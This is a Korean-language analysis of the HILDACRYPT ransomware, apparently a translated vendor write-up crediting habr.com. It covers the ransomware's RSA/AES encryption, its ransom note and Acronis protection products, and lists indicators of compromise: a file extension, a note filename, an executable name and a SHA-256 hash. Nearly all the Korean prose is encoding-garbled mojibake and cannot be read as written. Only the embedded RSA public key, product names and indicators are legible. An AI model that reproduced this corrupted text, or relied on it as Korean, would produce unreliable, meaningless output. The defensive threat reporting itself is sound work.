AES ๋ฐ IV ํ‚ค ์•”ํ˜ธํ™”๋Š” RSA-2048์„ ์‚ฌ์šฉํ•˜์—ฌ ์ˆ˜ํ–‰๋˜๋ฉฐ ์ธ์ฝ”๋”ฉ์€ Base64๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ˆ˜ํ–‰๋ฉ๋‹ˆ๋‹ค. RSA ๊ณต๊ฐœ ํ‚ค๋Š” XML ํ˜•์‹์˜ ์•”ํ˜ธํ™”๋œ ๋ฌธ์ž์—ด ์ค‘ ํ•˜๋‚˜๋กœ cryptolocker ๋ณธ๋ฌธ์— ์ €์žฅ๋ฉ๋‹ˆ๋‹ค.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

RSA ๊ณต๊ฐœ ํ‚ค๋Š” AES ํŒŒ์ผ ํ‚ค๋ฅผ ์•”ํ˜ธํ™”ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. RSA ๊ณต๊ฐœ ํ‚ค๋Š” Base64๋กœ ์ธ์ฝ”๋”ฉ๋˜๋ฉฐ ๋ชจ๋“ˆ๋Ÿฌ์Šค์™€ 65537์˜ ๊ณต๊ฐœ ์ง€์ˆ˜๋กœ ๊ตฌ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์•”ํ˜ธ ํ•ด๋…์—๋Š” ๊ณต๊ฒฉ์ž๊ฐ€ ๊ฐ–๊ณ  ์žˆ๋Š” RSA ๊ฐœ์ธ ํ‚ค๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

RSA ์•”ํ˜ธํ™” ํ›„ AES ํ‚ค๋Š” ์•”ํ˜ธํ™”๋œ ํŒŒ์ผ์— ์ €์žฅ๋œ Base64๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ธ์ฝ”๋”ฉ๋ฉ๋‹ˆ๋‹ค.

๋ชธ๊ฐ’ ๋ฉ”์‹œ์ง€

์•”ํ˜ธํ™”๊ฐ€ ์™„๋ฃŒ๋˜๋ฉด HILDACRYPT๋Š” ํŒŒ์ผ์„ ์•”ํ˜ธํ™”ํ•œ ํด๋”์— html ํŒŒ์ผ์„ ์”๋‹ˆ๋‹ค. ๋žœ์„ฌ์›จ์–ด ์•Œ๋ฆผ์—๋Š” ํ”ผํ•ด์ž๊ฐ€ ๊ณต๊ฒฉ์ž์—๊ฒŒ ์—ฐ๋ฝํ•  ์ˆ˜ ์žˆ๋Š” ๋‘ ๊ฐœ์˜ ์ด๋ฉ”์ผ ์ฃผ์†Œ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

๊ฐ•ํƒˆ ํ†ต์ง€๋ฌธ์—๋Š” "๋กœ๋ฆฌ๋Š” ์•ˆ์ „ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.)"๋ผ๋Š” ๋ฌธ๊ตฌ๋„ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์ผ๋ณธ์—์„œ ๊ธˆ์ง€๋œ ์–ด๋ฆฐ ์†Œ๋…€์˜ ๋“ฑ์žฅ์ด ํฌํ•จ๋œ ์• ๋‹ˆ๋ฉ”์ด์…˜ ๋ฐ ๋งŒํ™” ์บ๋ฆญํ„ฐ์— ๋Œ€ํ•œ ์–ธ๊ธ‰์ž…๋‹ˆ๋‹ค.

์ถœ๋ ฅ

์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด ๊ณ„์—ด์ธ HILDACRYPT๊ฐ€ ์ƒˆ ๋ฒ„์ „์„ ์ถœ์‹œํ–ˆ์Šต๋‹ˆ๋‹ค. ์•”ํ˜ธํ™” ๋ชจ๋ธ์€ ํ”ผํ•ด์ž๊ฐ€ ๋žœ์„ฌ์›จ์–ด๋กœ ์•”ํ˜ธํ™”๋œ ํŒŒ์ผ์„ ํ•ด๋…ํ•˜๋Š” ๊ฒƒ์„ ๋ฐฉ์ง€ํ•ฉ๋‹ˆ๋‹ค. Cryptolocker๋Š” ๋Šฅ๋™ ๋ณดํ˜ธ ๋ฐฉ๋ฒ•์„ ์‚ฌ์šฉํ•˜์—ฌ ๋ฐฑ์—… ์‹œ์Šคํ…œ ๋ฐ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜๊ณผ ๊ด€๋ จ๋œ ๋ณดํ˜ธ ์„œ๋น„์Šค๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•ฉ๋‹ˆ๋‹ค. HILDACRYPT์˜ ์ €์ž๋Š” Netflix์— ํ‘œ์‹œ๋œ ์• ๋‹ˆ๋ฉ”์ด์…˜ ์‹œ๋ฆฌ์ฆˆ Hilda์˜ ํŒฌ์ž…๋‹ˆ๋‹ค. ์˜ˆ๊ณ ํŽธ ๋งํฌ๋Š” ํ”„๋กœ๊ทธ๋žจ์˜ ์ด์ „ ๋ฒ„์ „์— ๋Œ€ํ•œ ๊ตฌ๋งค ํŽธ์ง€์— ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

์ผ๋ฐ˜์ ์œผ๋กœ ์•„ํฌ๋กœ๋‹ˆ์Šค ๋ฐฑ์—… ะธ ์•„ํฌ๋กœ๋‹ˆ์Šค ํŠธ๋ฃจ ์ด๋ฏธ์ง€ HILDACRYPT ๋žœ์„ฌ์›จ์–ด๋กœ๋ถ€ํ„ฐ ์ปดํ“จํ„ฐ๋ฅผ ๋ณดํ˜ธํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ ์ œ๊ณต์—…์ฒด๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ฐฉ๋ฒ•์œผ๋กœ ๊ณ ๊ฐ์„ ๋ณดํ˜ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Acronis ๋ฐฑ์—… ํด๋ผ์šฐ๋“œ. ์ด๋Ÿฌํ•œ ์†”๋ฃจ์…˜์—๋Š” ๋‹ค์Œ์ด ํฌํ•จ๋˜์–ด ๋ณดํ˜ธ๊ฐ€ ๋ณด์žฅ๋ฉ๋‹ˆ๋‹ค. ์‚ฌ์ด๋ฒ„ ๋ณด์•ˆ ๋ฐฑ์—…๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ํ†ตํ•ฉ ๋ณด์•ˆ ์‹œ์Šคํ…œ๋„ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. Acronis ์•กํ‹ฐ๋ธŒ ํ”„๋กœํ…์…˜ - ๊ธฐ๊ณ„ ํ•™์Šต ๋ชจ๋ธ๊ณผ ํ–‰๋™ ํœด๋ฆฌ์Šคํ‹ฑ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜๋Š” ์ด ๊ธฐ์ˆ ์€ ์ œ๋กœ๋ฐ์ด ๋žœ์„ฌ์›จ์–ด์˜ ์œ„ํ˜‘์— ๊ฐ€์žฅ ํšจ๊ณผ์ ์œผ๋กœ ๋Œ€์‘ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

ํƒ€ํ˜‘์˜ ์ง€ํ‘œ

ํŒŒ์ผ ํ™•์žฅ์ž HCY!
HILDACRYPTReadMe.html
๋ฌธ์ž "p"๊ฐ€ ํ•˜๋‚˜ ์žˆ๊ณ  ๋””์ง€ํ„ธ ์„œ๋ช…์ด ์—†๋Š” xamp.exe
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

์ถœ์ฒ˜ : habr.com

์ฝ”๋ฉ˜ํŠธ๋ฅผ ์ถ”๊ฐ€